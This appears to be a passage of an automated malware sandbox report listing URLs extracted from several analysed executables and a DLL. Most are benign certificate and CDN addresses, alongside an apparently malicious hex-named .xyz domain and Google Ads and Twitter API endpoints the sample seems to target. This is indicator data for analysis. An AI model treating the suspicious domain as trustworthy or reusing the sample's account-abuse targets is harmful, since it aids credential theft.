Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xDME?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yG8H?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMQmHU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1611970637183.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0:
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0B
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0E
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0F
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0K
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0M
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0P
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp, ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0R
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ocsp.thawte.com0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_user.dll.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_user.dll.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Cyfj6XGbkd.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Cyfj6XGbkd.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Cyfj6XGbkd.exeString found in binary or memory: http://sf.symcd.com0&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xDME.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yG8H.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092Zb5iS
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Cyfj6XGbkd.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 56BB1610C0318054.exe, 00000002.00000003.389623868.0000000004129000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvFEAD.tmp.9.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611970637183.exe, 00000009.00000002.384711842.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1611970637183.exe, 1611970637183.exe.2.drString found in binary or memory: http://www.nirsoft.net/
Source: download_user.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_user.dll.2.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-audio.com
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-cable.com
Source: Cyfj6XGbkd.exeString found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_user.dll.2.drString found in binary or memory: http://www.xunlei.com/
Source: download_user.dll.2.drString found in binary or memory: http://www.xunlei.com/GET
Source: 56BB1610C0318054.exeString found in binary or memory: http://www.youtube.com
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comT
Source: 56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comf
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpString found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Cyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpString found in binary or memory: https://charlesproxy.com/ssl1
Source: 56BB1610C0318054.exe, 00000004.00000003.376130421.0000000003D30000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 56BB1610C0318054.exe, 00000004.00000003.372926027.0000000003DBB000.00000004.00000001.sdmp, background.js.4.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 56BB1610C0318054.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 56BB1610C0318054.exe, 00000004.00000003.376130421.0000000003D30000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.373597851.0000000003D4D000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx-
Source: 56BB1610C0318054.exe, 00000004.00000003.373958396.0000000003D43000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxq
